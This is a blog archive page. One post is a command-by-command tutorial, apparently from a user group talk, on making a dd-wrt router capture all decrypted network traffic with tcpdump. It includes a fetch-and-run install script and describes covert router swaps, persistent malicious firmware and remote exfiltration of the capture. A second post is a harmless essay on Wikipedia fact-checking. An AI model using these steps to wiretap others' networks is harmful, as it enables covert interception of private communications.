Ideas Archives - InputOutput.io

Rooting a router: Wiretapping dd-wrt / OpenWRT embedded linux firmware

Note: The following post is written partially as a follow-up to the presentation I gave on dd-wrt at the December meeting of the Western North Carolina Linux Users Group.

Concept

If you’re running dd-wrt as your router (or OpenWRT, or Tomato for that matter), you already know how powerful it can be. Capabilities such as boosting signal strength, interacting with Dynamic DNS services, running a VPN server, and transitioning to ipv6 all come prepackaged standard edition, running on a mere 4MB of flash memory (and micro running on 2MB!) What I will show you is that using the features commonly bundled with dd-wrt, you can turn your router into a wiretap, regardless of your wireless security. I’ll be dealing specifically with dd-wrt v24-sp2, but you can also wiretap OpenWRT by following similar instructions.

The idea is this: you have a router sitting at a critical juncture in your network infrastructure. Packets are rapidly being routed in and out of various interfaces on the router. If we are dealing with a wireless router with security enabled, the router is an endpoint for this encryption. Which means that the packets will be decrypted upon arrival, before being pushed through the wire. Additionally, the OpenWRT / dd-wrt communities have ported a wide array of Linux projects to the platform. Notably, they’ve ported tcpdump, the powerful command-line packet analyzer, and libpcap, the C/C++ library required for capturing network traffic. Using such a tool at the router level means your network is owned.

There’s a problem though – once we have a capture going, where do we store it? Most of these routers only have extremely limited flash storage space, usually barely enough for the embedded firmware alone. Even those that have more can only store perhaps a few moments of a heavy traffic capture. Where is all that data to go? Well, we’re in luck: dd-wrt has precompiled support for CIFS (also known as SMB), Microsoft’s network sharing protocol. If we’re able to mount a network share, and store our capture there, then we don’t have to worry about storage limitations. We can even install the packages necessary for the capture on the remote filesystem.

Implementation

Let’s start with a base install. We’ll need ssh access, so lets load up the web interface and under Services → Services enable SSHd. The package manager OpenWRT uses is called ipkg. This is not available until we enable JFFS2 under Administration → Management. Next, create a CIFS share on the local machine. Here, our local machine’s ip is 192.168.1.2, and the network share is named “share.” SSH in as root, and issue the following commands to insert the CIFS module and mount the network share:

insmod /lib/modules/2.4.35/cifs.o
mount.cifs "\\\\192.168.1.2\\share" /jffs -o user=username,password=password

Nice, now we have the network share mounted. If you encounter an error issuing the mount.cifs command, double check your ip, share name, username, and password. Since we’ve essentially mounted over the already mounted /jffs, we need to issue an additional command for ipkg to cleanly update:

mkdir -p /jffs/tmp/ipkg
ipkg update

Once ipkg has updated its package list, we can see all that is available to us by issuing:

ipkg list

As you can see, there’s a ton of stuff we can install. At this point, though, I started encountering some problems. When I issued the “ipkg install tcpdump” command, it fetched and installed the required libpcap first. Then, it went to install tcpdump, and threw an error that libpcap wasn’t installed. I tried to install them manually, but that didn’t work either. So at this point I started looking for alternatives. Optware is another way to install packages, using ipkg in /opt rather than /jffs. Following the instructions here, I created a local ext2 filesystem available via the network share:

dd if=/dev/zero of=share/optware.ext2 bs=1 count=1 seek=10M
mkfs.ext2 share/optware.ext2

If you want more space for packages, change the seek parameter. Next, we’ll be mounting this to /opt on the router side. We’ll need to install kmod-loop first, and insert the loop and ext2 kernel modules:

ipkg install kmod-loop
insmod /lib/modules/2.4.35/ext2.o
insmod /jffs/lib/modules/2.4.30/loop.o
mount -o loop /jffs/optware.ext2 /opt

Great, now we have /opt mounted to the remote ext2 filesystem. Get the install script and install it:

wget http://www.3iii.dk/linux/optware/optware-install-ddwrt.sh -O - | tr -d '\r' > /tmp/optware-install.sh
sh /tmp/optware-install.sh

Excellent, now we have the port of optware installed on /opt! Lets run an ipkg update on this ipkg:

/opt/bin/ipkg update

For comparisons sake, lets just look at how many packages we now have available, as opposed to before:

root@DD-WRT:/opt# ipkg list | wc -l
652
root@DD-WRT:/opt# /opt/bin/ipkg list | wc -l
1242

So we’ve almost doubled the amount of packages available to us. And most importantly, no more complications with tcpdump:

/opt/bin/ipkg install tcpdump

Now that we have tcpdump and libpcap, we can dump our packets to the network share:

tcpdump not host 192.168.1.2 -s 0 -w /jffs/network.cap

From here on in, we can open the packet dump with wireshark and find lots of useful information. We can even store the commands in a start-up script in the dd-wrt web interface under Administration → Commands:

insmod /lib/modules/2.4.35/cifs.o
insmod /lib/modules/2.4.35/ext2.o
mount.cifs "\\\\192.168.1.2\\share" /jffs -o user=username,password=password
insmod /jffs/lib/modules/2.4.30/loop.o
mount -o loop /jffs/optware.ext2 /opt
tcpdump not host 192.168.1.2 -s 0 -w /jffs/network.cap &

Implications

Given the wide range of routers supported by dd-wrt/OpenWRT, this is a major security concern. Although this requires physical access to the device in question, there is nothing to stop an attacker from purchasing an identical model of router, installing dd-wrt and tcpdump on it, and swapping a target router with the malicious one. If the attacker already knows the wireless password, the malicious router can be configured such a swap would not draw attention. Resetting the router is no defense – the OpenWRT firmware modification kit can easily modify the firmware image file. Modifying the image file to add code that monitors network traffic would mean that any reset would only be restoring malicious firmware.
Such an attack need not be local. Most ISPs block CIFS traffic, but the router could be made to forward the CIFS ports through an SSH tunnel to a remote endpoint. The stock Dropbear SSH isn’t capable of tunneling, but openssh is available in the ipkg repository, and can be either included in the firmware or installed on the local /jffs space available. Sending all network traffic that goes over the wire to a remote endpoint may be impractical for an attacker, but packet headers still provide a wealth of information.

Wikiverify

The Problem:

Wikipedia is a great resource. In fact, it’s such a great resource that it’s the de-facto source of information for – well – most things that you want to know about. And it’s so all encompassing, it’s so expansive and extensive that you can find just about anything on it, from the frighteningly large rodent “capubera” to what exactly a “femme fatal” is to the intricate workings of the Rijndael encryption standard. Just a few years ago, you couldn’t find all this information all in one place. After all, wikipedia.org as a domain was only registered in January, 2001. A decade ago, you’d have to rely on the old textbooks, the infomercials that try to sell you the words of old white guys, to get even close to compiling the information that is accessible within a few keystrokes today. And the beautiful thing about it is that it’s all community driven. It’s not just a few old white guys anymore, it’s people from all across the globe collaborating on a masterpiece of information and accessibility. It’s an amorphous entity that is always growing, always changing and constantly reshaping itself. It’s the closest thing we have to the real live Hitchhikers Guide to the Galaxy. Its democratic nature is great, but its unaccountable nature is where the whole thing gets tricky.

And thats the real problem. People add stuff they’re not supposed to. Stupid stuff, silly stuff, misconceptions, innaccurasies, rumors and downright lies. The entries get cluttered with things they’re not supposed to. I can’t claim I’m not guilty of it. I’ve edited wikipedia entries in the past for kicks *cough*electromagneticpulse*cough*- but this just underlines the whole structural problem. Stephen Colbert, a personal hero of mine, causes havoc on wikipedia in a single 10-minute segment by urging watchers to edit the “elephant” entry. The result is entry locks, warnings of bias, needed citations, and a general site-wide loss of credibility. People don’t trust wikipedia the way they trust the good ol’ fashioned ink and paper. It’s enough to cause nostalgia, a longing for the halcyon days when information was sparse, but at least it had some bite behind its bark. Whats an honest obscure-information-seeker to do? Where can we turn?

There is one solution, always turned to in times of despair. “Check your sources!” It’s the time-cherished response of every undergrad college professor you’ve ever had. “Wikipedia may not be cited, not now, not ever!” they cry out in unison. If I didn’t know any better, I’d say it was an affront on our information-sharing culture. A way to make the information they possess seem a precious commodity in light of the rubbish of our wikimedia commons. After all, are they not the arbiters of accuracy? Still, what they say does make sense: you have no way of distinguishing the trash from the treasure for any given entry. Someone may have edited it to add one of the aforementioned innaccuracies just 10 minutes ago. Hell, you may have edited it, just to get in the few extra footnotes you’ve been looking for and to get a chuckle out of quoting Cleopatra saying “I know kung-fu.” So there has to be some greater source of authority to reference to when trying to speak authoritatively yourself. You can’t just reference any odd article you like, and expect it to be listened to like the wisdom of the ancients.

The Solution:

“But I’m so lazy!” you complain. “I don’t want to spider across twenty different newspapers, essays and electronic journals just to quote something I already know as fact!” At this point a few months ago, I would have said “Well, too bad! Life is hard, suck it up! Get off, er, on your lethargic ass, do some fancy google voodoo, and find that australian PM quote you were looking for!” But in all honesty, the complaints do make sense. The information is out there, in all its cross-hyper-linked glory, but in order to get to it you have to spend inordinate amounts of time looking for it from credible sources. Oh, pity me, I wish that wikipedia had both the credibility I’m looking for and the vast resources it already has! If only there were a way to combine the best of both worlds!

But then I had this crazy idea. What if, instead of wikipedia referring to sources of higher authority, wikipedia brought those sources of higher authority to itself? What if wikipedia set off a corner of itself, however small it may initially be, and said “we swear by the hair on our chinny-chin-chin, that this information is verifiably true.” Let’s call it verified.wikipedia.org. Now how would they verify the quality of content on this subdomain? Fact-checkers. That’s right- every major newspaper has them. They go around, looking at the articles about to go to print, and, well, check their facts. To make sure the quality of the article that is about to go on the newsstands lives up to the time-honored tradition of the Sun Times Press Journal Herald. And somehow magically this works. So bring fact checkers to wikipedia. Make them paid staff-people on the largest source of information of all time.

Sure, there are some logistical problems. For instance, wikipedia coming up with crazy schemes to make make ends meet as it is, but no one claimed this would be easy. One possibility is getting folks over at the Science Commons on board. That organization is certainly starting to address some of the problems of reliability and access to information. Another avenue is actually getting the universities themselves to fund such a project, and improve their public image besides. With enough of a starting nudge, we could even get professors and voices of authority to volunteer, and offer their words of wisdom. Wikipedia could become a platform for the collaboration of experts in various fields, pooling their knowledge into a central, open network.

The great thing about this is that there is really nothing to lose. If it doesn’t catch on, then oh well, we tried. No harm done. But if this does catch on, it could be something really interesting. As the saying goes, the sky is the limit.